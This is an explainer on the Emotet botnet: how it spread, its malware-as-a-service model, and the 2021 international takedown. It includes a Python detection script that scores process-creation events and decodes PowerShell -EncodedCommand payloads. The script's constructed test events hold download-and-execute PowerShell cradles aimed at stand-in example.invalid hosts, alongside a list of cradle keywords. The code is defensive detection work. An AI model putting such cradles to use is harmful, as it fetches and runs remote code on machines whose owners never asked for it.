EXECUTIVE SUMMARY:

In a recent international law enforcement operation, agencies dismantled the infrastructure supporting Emotet. As of July 2020, a global threat index showed that Emotet had impacted 5% of organizations worldwide; by early 2021 that figure had risen to 19%.

Check Point expert Lotem Finklestein calls Emotet “The most successful and prevalent malware of 2020 by a long shot.” Emotet earned its reputation due to its dynamic nature, technical features, and the organized business model supporting it.

When did Emotet first emerge on the scene?

Emotet is known as one of the world’s largest botnets and has existed since 2014. It began as a banking trojan designed to steal victims’ online banking credentials.

Although its early versions were readily detected by anti-malware tools, Emotet evolved into a malware-as-a-service platform that saw extensive use by other criminal groups.

The US Department of Homeland Security estimates that incidents involving Emotet cost organizations over $1M, on average.

How did Emotet work? 

Emotet launched malspam campaigns whose emails carried malicious attachments. When opened, an attachment launched PowerShell to download the Emotet binary from remote websites onto the victim’s machine, which was then added to the botnet.

The botnet grew in size and capabilities over time.

Emotet also had worm-like capabilities: spreading from machine to machine across a network was one of its strengths. It was difficult to detect, and most victims did not discover the infection until long after it had occurred.
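The infection chain described above (an Office attachment spawning PowerShell, which pulls a binary from a remote site) leaves a recognizable trace in process-creation telemetry, and that is where defenders usually caught Emotet. The script below is an added example written for this article; it is not Emotet’s own code and not any vendor’s detection rule. It assumes Sysmon Event ID 1 style records with Image, ParentImage and CommandLine fields, decodes the base64 UTF-16LE payload behind -EncodedCommand, and scores each event on the Office-to-script-host parent relationship, hidden-window flags, download-cradle keywords and embedded URLs. The sample events, the PowerShell script and the example.invalid URLs are constructed for illustration.

```python
"""Flag the Office -> PowerShell download stage of an Emotet-style infection
in process-creation telemetry (Sysmon Event ID 1 / Windows 4688 style records).

Added example for this article: not Emotet's own code and not any vendor's
detection rule. Field names (Image, ParentImage, CommandLine) follow Sysmon;
the sample events, script and URLs below are constructed for illustration.
"""
import base64
import json
import re
from typing import Iterable, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Substrings that betray a PowerShell download-and-execute cradle.
CRADLE_MARKERS = ("net.webclient", "downloadfile", "downloadstring",
                  "invoke-webrequest", "iwr ", "bitstransfer",
                  "invoke-expression", "iex ", "iex(", "start-process")
URL_RE = re.compile(r'''https?://[^\s'";,)`]+''', re.IGNORECASE)
# -EncodedCommand and its abbreviations; PowerShell base64-encodes UTF-16LE text.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way attackers (and admins) do."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> dict:
    """Score one process-creation event and list the evidence behind the score."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Analyse the visible command line plus whatever -enc was hiding.
    visible = cmdline if decoded is None else cmdline + " " + decoded
    low = visible.lower()

    score, evidence = 0, []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        score += 3
        evidence.append(f"office app {parent} spawned {image}")
    if decoded is not None:
        score += 1
        evidence.append("base64 -EncodedCommand decoded")
    if HIDDEN_RE.search(visible):
        score += 1
        evidence.append("hidden window requested")
    markers = sorted({m.strip("( ") for m in CRADLE_MARKERS if m in low})
    if markers:
        score += 2
        evidence.append("download cradle: " + ", ".join(markers))
    urls = URL_RE.findall(visible)
    if urls:
        score += 1
        evidence.append("remote URLs: " + ", ".join(urls))

    severity = ("high" if score >= 5 else "medium" if score >= 3
                else "low" if score else "none")
    return {"severity": severity, "score": score, "evidence": evidence, "urls": urls}


def scan(events: Iterable[dict]) -> List[dict]:
    """Return the events that deserve an alert, highest score first."""
    hits = [dict(e, **analyze_event(e)) for e in events]
    return sorted((h for h in hits if h["severity"] != "none"),
                  key=lambda h: -h["score"])


# Constructed sample telemetry. Event 1 mimics the malspam attachment stage:
# Word launches a hidden PowerShell whose encoded script walks a list of URLs
# and runs the first binary it manages to download. Event 2 is benign admin
# use; event 3 is an unencoded cradle launched from Explorer.
EMOTET_STYLE_SCRIPT = (
    "$u='http://example.invalid/wp-content/x.php','http://example.invalid/y.php';"
    "$w=New-Object Net.WebClient;$p=$env:TEMP+'\\123.exe';"
    "foreach($a in $u){try{$w.DownloadFile($a,$p);Start-Process $p;break}catch{}}"
)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + encode_command(EMOTET_STYLE_SCRIPT)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a.ps1')\""},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(json.dumps({k: hit[k] for k in ("severity", "score", "evidence")}, indent=2))
```

Running the script reports the Word-spawned hidden PowerShell as high severity with the two download URLs extracted from the decoded payload, the Explorer-launched cradle as medium, and the Get-Date invocation as nothing at all. The point of decoding -EncodedCommand before matching is that Emotet’s loaders put every meaningful keyword and URL inside the base64 blob; a rule that only inspects the visible command line sees nothing but “-enc”.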

What made the Emotet botnet so successful? 

Emotet is considered an advanced, self-propagating and modular Trojan. In a single year, the botnet managed to deliver phishing emails with more than 150,000 unique subject lines and 100,000 different file names for the attachments.

The internationally coordinated response

Authorities were able to disrupt Emotet from the inside. “This operation is the result of a collaborative effort between…the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada and Ukraine, with international activity coordinated by Europol and Eurojust,” stated Europol.

Two of the three Emotet command and control servers were located in the Netherlands. The Dutch police report that an operation is in place to “reset Emotet“.

The newly deployed software carries time-bomb-like code that is expected to uninstall the Emotet malware from infected computers worldwide on April 25th, 2021.

Who created Emotet?

The Emotet botnet was controlled by a group tracked as TA542, which used its infections to deliver other crime groups’ malware, notably TrickBot. The TrickBot operators are in turn known for deploying the business-destroying Ryuk ransomware.

Emotet’s operators are unique in that they collaborated with other organized crime groups. This allowed them to net higher gains. It’s also part of how Emotet’s operators gained a foothold in so many organizations.

An investigation into the identity of the criminals responsible for running Emotet is still ongoing.

An under-the-radar Emotet botnet attack? 

If you suspect that your organization may have been compromised by Emotet, the Dutch national police have set up a website where you can check. The text can be translated into English.

For organizations that have been hit by Emotet

“As part of the global remediation strategy…information was distributed worldwide via the network of so-called Computer Emergency Response Teams (CERTs),” says Europol.

For more on botnets and Emotet, visit the BBC.